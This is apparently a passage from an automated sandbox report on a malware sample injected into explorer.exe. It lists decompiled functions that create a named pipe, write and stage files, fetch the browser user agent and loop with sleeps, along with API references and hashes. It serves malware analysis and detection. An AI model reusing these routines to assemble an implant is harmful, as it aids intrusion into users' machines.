        • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1DE
        • LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1EB
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: HandleLibraryLoadModule
        • String ID:
        • API String ID: 4133054770-0
        • Opcode ID: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
        • Instruction ID: eaac88a08efcd0d2a3f1dbc0b3101d04e6d50373736468e8fc033cf0e2f21452
        • Opcode Fuzzy Hash: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
        • Instruction Fuzzy Hash: EBF0EC32700114ABDB44BB6DDC898AEB7EDBF54790714403AF406D3251DE70DE0087A0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00082C8F, Relevance: 1.6, APIs: 1, Instructions: 110COMMON
        Download Yara Rule
        C-Code - Quality: 65%
        			E00082C8F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				WCHAR* _v8;
				char _v12;
				char _v44;
				char _v564;
				char _v1084;
				void* __esi;
				void* _t23;
				struct _SECURITY_ATTRIBUTES* _t25;
				int _t27;
				char _t32;
				char _t38;
				intOrPtr _t39;
				void* _t40;
				WCHAR* _t41;
				void* _t54;
				char* _t60;
				char* _t63;
				void* _t70;
				WCHAR* _t71;
				intOrPtr* _t73;

				_t70 = __ecx;
				_push(__ecx);
				E0008B700(__edx,  &_v44, __eflags, __fp0);
				_t52 = _t70;
				if(E0008BB8D(_t70) == 0) {
					_t23 = E00082BA4( &_v1084, _t70, 0x104); // executed
					_pop(_t54);
					__eflags = _t23;
					if(__eflags == 0) {
						_t71 = E00082C64( &_v1084, __eflags);
					} else {
						E0008B012(_t54,  &_v564); // executed
						_t32 = E0008109A(_t54, 0x375);
						_push(0);
						_v12 = _t32;
						_push( &_v44);
						_t60 = "\\";
						_push(_t60);
						_push(_t32);
						_push(_t60);
						_push( &_v564);
						_push(_t60);
						_t71 = E000892E5( &_v1084);
						E000885D5( &_v12);
					}
				} else {
					_t38 = E0008109A(_t52, 0x4e0);
					 *_t73 = 0x104;
					_v12 = _t38;
					_t39 =  *0x9e684; // 0x133f8f0
					_t40 =  *((intOrPtr*)(_t39 + 0xe0))(_t38,  &_v564);
					_t78 = _t40;
					if(_t40 != 0) {
						_t41 = E0008109A( &_v564, 0x375);
						_push(0);
						_v8 = _t41;
						_push( &_v44);
						_t63 = "\\";
						_push(_t63);
						_push(_t41);
						_push(_t63);
						_t71 = E000892E5( &_v564);
						E000885D5( &_v8);
					} else {
						_t71 = E00082C64( &_v44, _t78);
					}
					E000885D5( &_v12);
				}
				_v8 = _t71;
				_t25 = E0008B269(_t71);
				if(_t25 == 0) {
					_t27 = CreateDirectoryW(_t71, _t25); // executed
					if(_t27 == 0 || E0008B269(_t71) == 0) {
						E0008861A( &_v8, 0xfffffffe);
						_t71 = _v8;
					}
				}
				return _t71;
			}























        0x00082c9e
        0x00082ca0
        0x00082ca3
        0x00082ca9
        0x00082cb2
        0x00082d36
        0x00082d3b
        0x00082d3c
        0x00082d3e
        0x00082d8f
        0x00082d40
        0x00082d46
        0x00082d50
        0x00082d55
        0x00082d5a
        0x00082d5d
        0x00082d5e
        0x00082d63
        0x00082d64
        0x00082d65
        0x00082d6c
        0x00082d6d
        0x00082d7a
        0x00082d80
        0x00082d85
        0x00082cb4
        0x00082cb9
        0x00082cbe
        0x00082ccc
        0x00082cd0
        0x00082cd5
        0x00082cdb
        0x00082cdd
        0x00082ced
        0x00082cf2
        0x00082cf7
        0x00082cfa
        0x00082cfb
        0x00082d00
        0x00082d01
        0x00082d02
        0x00082d0f
        0x00082d15
        0x00082cdf
        0x00082ce4
        0x00082ce4
        0x00082d21
        0x00082d26
        0x00082d93
        0x00082d96
        0x00082d9d
        0x00082da1
        0x00082da9
        0x00082dbc
        0x00082dc1
        0x00082dc5
        0x00082da9
        0x00082dca

        APIs
        • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000), ref: 00082DA1
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: CreateDirectory
        • String ID:
        • API String ID: 4241100979-0
        • Opcode ID: 334b7fb11edf8458ac038dde38966bd3d6edb3cda6ed2f855dcb4e5129f97406
        • Instruction ID: 661ddabdbbf5835fe1c09d22864260864737aa38d39f94c9f57271a24964c515
        • Opcode Fuzzy Hash: 334b7fb11edf8458ac038dde38966bd3d6edb3cda6ed2f855dcb4e5129f97406
        • Instruction Fuzzy Hash: D931A4B1914314AADB24FBA4CC51AFE77ACBF04350F040169F985E3182EF749F408BA4
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000831C2, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
        Download Yara Rule
        C-Code - Quality: 79%
        			E000831C2(void* __edx, void* __eflags) {
				CHAR* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				signed int _t10;
				intOrPtr _t11;
				intOrPtr _t12;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t22;
				intOrPtr _t28;
				void* _t38;
				CHAR* _t40;

				_t38 = __edx;
				_t28 =  *0x9e688; // 0xb0000
				_t10 = E0008C292( *((intOrPtr*)(_t28 + 0xac)), __eflags);
				_t40 = _t10;
				_v8 = _t40;
				if(_t40 != 0) {
					_t11 = E00088604(0x80000); // executed
					 *0x9e724 = _t11;
					__eflags = _t11;
					if(_t11 != 0) {
						_t12 = E0008BD10(); // executed
						_v16 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_push(0xc);
							_pop(0);
							_v12 = 1;
						}
						_v20 = 0;
						__eflags = 0;
						asm("sbb eax, eax");
						_t16 = CreateNamedPipeA(_t40, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v20);
						 *0x9e674 = _t16;
						__eflags = _t16 - 0xffffffff;
						if(_t16 != 0xffffffff) {
							E0008BC7A( &_v20, _t38); // executed
							_t18 = E000898EE(E000832A1, 0, __eflags, 0, 0); // executed
							__eflags = _t18;
							if(_t18 != 0) {
								goto L12;
							}
							_t22 =  *0x9e684; // 0x133f8f0
							 *((intOrPtr*)(_t22 + 0x30))( *0x9e674);
							_push(0xfffffffd);
							goto L11;
						} else {
							 *0x9e674 = 0;
							_push(0xfffffffe);
							L11:
							_pop(0);
							L12:
							E0008861A( &_v8, 0xffffffff);
							return 0;
						}
					}
					_push(0xfffffff5);
					goto L11;
				}
				return _t10 | 0xffffffff;
			}
















        0x000831c2
        0x000831c8
        0x000831d8
        0x000831dd
        0x000831df
        0x000831e4
        0x000831f5
        0x000831fa
        0x00083200
        0x00083202
        0x0008320b
        0x00083210
        0x00083213
        0x00083215
        0x00083217
        0x00083219
        0x0008321a
        0x0008321a
        0x00083227
        0x0008322a
        0x0008322f
        0x00083249
        0x0008324f
        0x00083254
        0x00083257
        0x00083263
        0x00083271
        0x00083278
        0x0008327a
        0x00000000
        0x00000000
        0x0008327c
        0x00083287
        0x0008328a
        0x00000000
        0x00083259
        0x00083259
        0x0008325f
        0x0008328c
        0x0008328c
        0x0008328d
        0x00083293
        0x00000000
        0x0008329c
        0x00083257
        0x00083204
        0x00000000
        0x00083204
        0x00000000

        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: ef1db64370f73cb2a10a24a51a86a1782430a7c5df0a70211d0b58567d7404a5
        • Instruction ID: 8572b94192bc1e43ddf863f0276067eeaee28e73aa111561e36aea24d5a940c8
        • Opcode Fuzzy Hash: ef1db64370f73cb2a10a24a51a86a1782430a7c5df0a70211d0b58567d7404a5
        • Instruction Fuzzy Hash: 6821C872604211AAEB10FBB9EC45FAE77A8FB95B74F20032AF165D71D1EE3489008751
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00085AFF, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E00085AFF(intOrPtr __edx, void* __fp0) {
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				intOrPtr* _t22;
				intOrPtr _t23;
				signed int _t30;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr* _t46;
				signed int _t47;
				void* _t55;

				_t55 = __fp0;
				_t45 = __edx;
				_t47 = 0;
				_t22 = E00088604(0x14);
				_t38 =  *0x9e688; // 0xb0000
				_t46 = _t22;
				if( *((short*)(_t38 + 0x22a)) == 0x3a) {
					_v36 =  *((intOrPtr*)(_t38 + 0x228));
					_v34 =  *((intOrPtr*)(_t38 + 0x22a));
					_v32 =  *((intOrPtr*)(_t38 + 0x22c));
					_v30 = 0;
					GetDriveTypeW( &_v36); // executed
				}
				 *_t46 = 2;
				 *(_t46 + 4) = _t47;
				_t23 =  *0x9e688; // 0xb0000
				 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t23 + 0x224));
				_t40 = E00085A7B( *((intOrPtr*)(_t23 + 0x224)), _t45, _t55);
				 *((intOrPtr*)(_t46 + 0xc)) = _t40;
				if(_t40 == 0) {
					L9:
					if(E00082DCB() == 0) {
						goto L11;
					} else {
						_t47 = _t47 | 0xffffffff;
					}
				} else {
					_t45 =  *_t40;
					_t30 = _t47;
					if(_t45 == 0) {
						goto L9;
					} else {
						_t44 =  *((intOrPtr*)(_t40 + 4));
						while( *((intOrPtr*)(_t44 + _t30 * 8)) != 0x3b) {
							_t30 = _t30 + 1;
							if(_t30 < _t45) {
								continue;
							} else {
								goto L9;
							}
							goto L12;
						}
						if( *((intOrPtr*)(_t44 + 4 + _t30 * 8)) != _t47) {
							L11:
							E00084D6D(_t46, _t45, _t55);
						} else {
							goto L9;
						}
					}
				}
				L12:
				E0008A39E();
				E0008A39E();
				return _t47;
			}

















        0x00085aff
        0x00085aff
        0x00085b0a
        0x00085b0c
        0x00085b12
        0x00085b18
        0x00085b22
        0x00085b2b
        0x00085b36
        0x00085b41
        0x00085b47
        0x00085b4f
        0x00085b4f
        0x00085b55
        0x00085b5b
        0x00085b5e
        0x00085b69
        0x00085b71
        0x00085b73
        0x00085b78
        0x00085b98
        0x00085b9f
        0x00000000
        0x00085ba1
        0x00085ba1
        0x00085ba1
        0x00085b7a
        0x00085b7a
        0x00085b7c
        0x00085b80
        0x00000000
        0x00085b82
        0x00085b82
        0x00085b85
        0x00085b8b
        0x00085b8e
        0x00000000
        0x00085b90
        0x00000000
        0x00085b90
        0x00000000
        0x00085b8e
        0x00085b96
        0x00085ba6
        0x00085ba8
        0x00000000
        0x00000000
        0x00000000
        0x00085b96
        0x00085b80
        0x00085bad
        0x00085bb0
        0x00085bb8
        0x00085bc3

        APIs
          • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
        • GetDriveTypeW.KERNELBASE(?), ref: 00085B4F
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: AllocateDriveHeapType
        • String ID:
        • API String ID: 414167704-0
        • Opcode ID: 5fad3a3b786f27ccd02a28058a2f299cb1a65abd77b56508b1054d3f76a11603
        • Instruction ID: 556f522260d7e6bdf941df906934654c795a6f01da19a51ea332bd0742bdc193
        • Opcode Fuzzy Hash: 5fad3a3b786f27ccd02a28058a2f299cb1a65abd77b56508b1054d3f76a11603
        • Instruction Fuzzy Hash: C4213638600B169BC714BFA4DC489ADB7B0FF58325B24813EE49587392FB32C842CB85
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008E450, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
        Download Yara Rule
        C-Code - Quality: 71%
        			E0008E450(void* __ecx, void* __edx) {
				char _v8;
				intOrPtr* _t5;
				intOrPtr _t10;
				intOrPtr* _t11;
				void* _t12;

				_push(__ecx);
				_t5 =  *0x9e6b0; // 0x1430440
				if( *_t5 == 0) {
					_v8 = E000895C7(0x2a7);
					 *0x9e788 = E000891A6(_t6, 0);
					E000885C2( &_v8);
					goto L4;
				} else {
					_v8 = 0x100;
					_t10 = E00088604(0x101);
					 *0x9e788 = _t10;
					_t11 =  *0x9e6b0; // 0x1430440
					_t12 =  *_t11(0, _t10,  &_v8); // executed
					if(_t12 == 0) {
						L4:
						return 0;
					} else {
						return E0008861A(0x9e788, 0xffffffff) | 0xffffffff;
					}
				}
			}








        0x0008e453
        0x0008e454
        0x0008e45c
        0x0008e4a6
        0x0008e4b3
        0x0008e4b8
        0x00000000
        0x0008e45e
        0x0008e463
        0x0008e46a
        0x0008e473
        0x0008e47a
        0x0008e481
        0x0008e485
        0x0008e4bd
        0x0008e4c0
        0x0008e487
        0x0008e499
        0x0008e499
        0x0008e485

        APIs
          • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
        • ObtainUserAgentString.URLMON(00000000,00000000,00000100,00000100,?,0008E4F7), ref: 0008E481
          • Part of subcall function 0008861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: Heap$AgentAllocateFreeObtainStringUser
        • String ID:
        • API String ID: 471734292-0
        • Opcode ID: e1b1cfbf227747cf64feb4deb7d262467d815f04f794748821e1b714f717f6a7
        • Instruction ID: f91671ab82a028632dec16c50dcaaaafc6d594eba443ed6fbe21b10f95aa2484
        • Opcode Fuzzy Hash: e1b1cfbf227747cf64feb4deb7d262467d815f04f794748821e1b714f717f6a7
        • Instruction Fuzzy Hash: 76F0CD30608240EBFB84FBB4DC4AAA977E0BB10324F644259F056D32D2EEB49D009715
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008A65C, Relevance: 1.5, APIs: 1, Instructions: 37fileCOMMON
        Download Yara Rule
        C-Code - Quality: 88%
        			E0008A65C(void* __ecx, void* __edx, intOrPtr _a4) {
				long _v8;
				void* _v12;
				void* _t13;
				void* _t21;
				void* _t23;
				void* _t26;

				_t23 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t26 = 0;
				_v12 = __ecx;
				_t21 = __edx;
				if(_a4 == 0) {
					L3:
					_t13 = 1;
				} else {
					while(1) {
						_v8 = _v8 & 0x00000000;
						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
							break;
						}
						_t26 = _t26 + _v8;
						_t23 = _v12;
						if(_t26 < _a4) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					_t13 = 0;
				}
				L4:
				return _t13;
			}









        0x0008a65c
        0x0008a65f
        0x0008a660
        0x0008a663
        0x0008a665
        0x0008a668
        0x0008a66d
        0x0008a69e
        0x0008a6a0
        0x0008a66f
        0x0008a66f
        0x0008a66f
        0x0008a691
        0x00000000
        0x00000000
        0x0008a693
        0x0008a696
        0x0008a69c
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x0008a69c
        0x0008a6a5
        0x0008a6a5
        0x0008a6a1
        0x0008a6a4

        APIs
        • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00088F51,?), ref: 0008A689
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: FileWrite
        • String ID:
        • API String ID: 3934441357-0
        • Opcode ID: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
        • Instruction ID: 0b494a87cdc3703bbe533562170335e27c5b07854cca77c3918aadfd965e8834
        • Opcode Fuzzy Hash: 5df19e21d3ddb09ad6c4c11454da19da2bcff3529875a62912f8edc0b597093c
        • Instruction Fuzzy Hash: 3EF01D72A10128BFEB10DF98C884BAA7BECFB05781F14416AB545E7144E670EE4087A1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008A5F7, Relevance: 1.5, APIs: 1, Instructions: 32fileCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E0008A5F7(WCHAR* __ecx, long __edx) {
				intOrPtr _t6;
				long _t12;
				void* _t13;

				_t12 = __edx;
				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
				if(_t13 != 0xffffffff) {
					if(_t12 == 4) {
						_t6 =  *0x9e684; // 0x133f8f0
						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
					}
					return _t13;
				}
				return 0;
			}






        0x0008a601
        0x0008a615
        0x0008a61a
        0x0008a623
        0x0008a625
        0x0008a62f
        0x0008a62f
        0x00000000
        0x0008a635
        0x00000000

        APIs
        • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,00088F39), ref: 0008A612
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
        • Instruction ID: b222d3866c60dc690caa0f3d26d08f48d1805b8db722e2ad4e11b8f14bdb970b
        • Opcode Fuzzy Hash: b3b88b4ae18cf6f2a9577180b67bb23ad81d8c5397a9feafbeb8474c43ba8e57
        • Instruction Fuzzy Hash: C1E0DFB23000147FFB206A689CC8F7B26ACF7967F9F060232F691C3290D6208C014371
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00083017, Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E00083017() {
				signed int _t4;
				intOrPtr _t8;
				void* _t11;

				_t4 =  *0x9e688; // 0xb0000
				if( *((intOrPtr*)(_t4 + 0x214)) != 3) {
					L3:
					return _t4 | 0xffffffff;
				} else {
					_t4 = E0008BB20(_t11);
					if(_t4 != 0) {
						goto L3;
					} else {
						AllocConsole();
						_t8 =  *0x9e684; // 0x133f8f0
						 *((intOrPtr*)(_t8 + 0x118))(E00082FF7, 1);
						return 0;
					}
				}
			}






        0x00083017
        0x00083023
        0x0008304e
        0x00083051
        0x00083025
        0x00083025
        0x0008302c
        0x00000000
        0x0008302e
        0x00083033
        0x00083039
        0x00083045
        0x0008304d
        0x0008304d
        0x0008302c

        APIs
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: AllocConsole
        • String ID:
        • API String ID: 4167703944-0
        • Opcode ID: 98fbbdecb1ae9542cf8ec98e6f71def4586e7244e81903211f4d867ad5e511a6
        • Instruction ID: ec183062af37bb11ca52ab854039e277753fe4296209864586c1fc79c77fff40
        • Opcode Fuzzy Hash: 98fbbdecb1ae9542cf8ec98e6f71def4586e7244e81903211f4d867ad5e511a6
        • Instruction Fuzzy Hash: 91E017312101059BEA10FB34CE4AAE432E0BF64B65F8601B0F254CA0A2DBB88D80CB12
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008A63B, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
        Download Yara Rule
        C-Code - Quality: 68%
        			E0008A63B(WCHAR* __ecx) {
				signed int _t5;

				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				_t2 = _t5 + 1; // 0x1
				asm("sbb ecx, ecx");
				return _t5 &  ~_t2;
			}




        0x0008a64f
        0x0008a652
        0x0008a657
        0x0008a65b

        APIs
        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,0008A6C9,00000000,00000400,00000000,0008F8B5,0008F8B5,?,0008FA56,00000000), ref: 0008A64F
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
        • Instruction ID: 701424f55706607c20a779b1f605f6a3a9bf58f01b0c22295887d68b81bdb902
        • Opcode Fuzzy Hash: bae718c7ab4e0e70489fab14bbe76478ebf5004892df9015de5de8492d217ac9
        • Instruction Fuzzy Hash: FCD012B23A0100BEFB2C8B34CD5AF72329CE710701F22025C7A06EA0E1CA69E9048720
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00088604, Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E00088604(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x9e768, 8, _a4); // executed
				return _t2;
			}




        0x00088612
        0x00088619

        APIs
        • RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
        • Instruction ID: 357be25924eba7ef04d183b2a47d12fe0e858354009690af1988e616ee4df9af
        • Opcode Fuzzy Hash: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
        • Instruction Fuzzy Hash: 7FB09235084A08BBFE811B81ED09A847F69FB45A59F008012F608081708A6668649B82
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008B269, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E0008B269(WCHAR* __ecx) {

				return 0 | GetFileAttributesW(__ecx) != 0xffffffff;
			}



        0x0008b27c

        APIs
        • GetFileAttributesW.KERNELBASE(00000000,00084E7B), ref: 0008B26F
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: AttributesFile
        • String ID:
        • API String ID: 3188754299-0
        • Opcode ID: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
        • Instruction ID: 2eec04d83ef220e7df840366bf7910a786624a5db3ebee8bff433549f6c66efd
        • Opcode Fuzzy Hash: 3fbf0e638217c05f6a6210c279be2eea434ef6a1c739ce4732bf75090bac18c4
        • Instruction Fuzzy Hash: A4B092B62200404BCA189B38998484D32906B182313220759B033C60E1D624C8509A00
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000885EF, Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E000885EF() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x9e768 = _t1;
				return _t1;
			}




        0x000885f8
        0x000885fe
        0x00088603

        APIs
        • HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: CreateHeap
        • String ID:
        • API String ID: 10892065-0
        • Opcode ID: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
        • Instruction ID: a1789a6bc8b77e7cca538026a270896d431aa116e0d29a0d1dd02ebd4a2bf545
        • Opcode Fuzzy Hash: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
        • Instruction Fuzzy Hash: E5B01270684700A6F2905B609C06B007550B340F0AF304003F704582D0CAB41004CB16
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0008F9BF, Relevance: 1.4, APIs: 1, Instructions: 119sleepCOMMON
        Download Yara Rule
        C-Code - Quality: 89%
        			E0008F9BF(void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _t26;
				char _t27;
				intOrPtr _t29;
				void* _t31;
				void* _t36;
				char _t38;
				intOrPtr _t39;
				char _t42;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr* _t63;
				intOrPtr _t66;
				char* _t67;
				intOrPtr _t69;
				char _t78;
				void* _t81;
				void* _t82;

				_t26 =  *0x9e654; // 0x133fd20
				_t27 = E00088604( *((intOrPtr*)(_t26 + 4))); // executed
				_v12 = _t27;
				if(_t27 != 0) {
					_t63 =  *0x9e654; // 0x133fd20
					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
						E000886E1(_t27,  *_t63, 0x400);
						_v8 = 0;
						_t36 = E0008109A(_t63, 0x34a);
						_t66 =  *0x9e688; // 0xb0000
						_t72 =  !=  ? 0x67d : 0x615;
						_t38 = E000895E1(_t66,  !=  ? 0x67d : 0x615);
						_push(0);
						_push(_t36);
						_t67 = "\\";
						_v24 = _t38;
						_push(_t67);
						_push(_t38);
						_t39 =  *0x9e688; // 0xb0000
						_push(_t67);
						_v20 = E000892E5(_t39 + 0x1020);
						_t42 = E0008A6A9( &_v8, _t41,  &_v8); // executed
						_v16 = _t42;
						E000885D5( &_v24);
						E000885D5( &_v20);
						_t73 = _v16;
						_t82 = _t81 + 0x3c;
						_t69 = _v8;
						if(_v16 != 0 && _t69 > 0x400) {
							_t51 =  *0x9e654; // 0x133fd20
							_t52 =  *((intOrPtr*)(_t51 + 4));
							_t53 =  <  ? _t69 : _t52;
							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
							E000886E1(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
							_t69 = _v8;
							_t82 = _t82 + 0xc;
						}
						E0008861A( &_v16, _t69);
						E0008861A( &_v20, 0xfffffffe);
						_t27 = _v12;
						_t81 = _t82 + 0x10;
						_t63 =  *0x9e654; // 0x133fd20
					}
					_t78 = 0;
					while(1) {
						_t29 =  *0x9e688; // 0xb0000
						_t31 = E0008A77D(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
						_t81 = _t81 + 0xc;
						if(_t31 >= 0) {
							break;
						}
						Sleep(1);
						_t78 = _t78 + 1;
						if(_t78 < 0x2710) {
							_t27 = _v12;
							_t63 =  *0x9e654; // 0x133fd20
							continue;
						}
						break;
					}
					E0008861A( &_v12, 0); // executed
				}
				return 0;
			}

























        0x0008f9c5
        0x0008f9cd
        0x0008f9d2
        0x0008f9d8
        0x0008f9de
        0x0008f9f1
        0x0008f9fb
        0x0008fa05
        0x0008fa08
        0x0008fa0d
        0x0008fa23
        0x0008fa27
        0x0008fa2c
        0x0008fa2d
        0x0008fa2e
        0x0008fa33
        0x0008fa36
        0x0008fa37
        0x0008fa38
        0x0008fa3d
        0x0008fa4c
        0x0008fa51
        0x0008fa56
        0x0008fa5d
        0x0008fa66
        0x0008fa6b
        0x0008fa6e
        0x0008fa71
        0x0008fa76
        0x0008fa7c
        0x0008fa81
        0x0008fa86
        0x0008fa89
        0x0008fa9c
        0x0008faa1
        0x0008faa4
        0x0008faa4
        0x0008faac
        0x0008fab7
        0x0008fabc
        0x0008fabf
        0x0008fac2
        0x0008fac2
        0x0008fac8
        0x0008faca
        0x0008face
        0x0008fad9
        0x0008fade
        0x0008fae3
        0x00000000
        0x00000000
        0x0008faec
        0x0008faf2
        0x0008faf9
        0x0008fafb
        0x0008fafe
        0x00000000
        0x0008fafe
        0x00000000
        0x0008faf9
        0x0008fb0b
        0x0008fb14
        0x0008fb18

        APIs
          • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
        • Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,0008F8B5,?,?,?,0008FCB9,00000000), ref: 0008FAEC
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: AllocateHeapSleep
        • String ID:
        • API String ID: 4201116106-0
        • Opcode ID: ca1f85b10fce3d7ab917c7b8650cfc21e56fba2a81fbb79344a5bac3ebb63321
        • Instruction ID: 732f9496a7e373a88c7c7ec427939724ae18ee305fc23bc779ce3543d22a3d2a
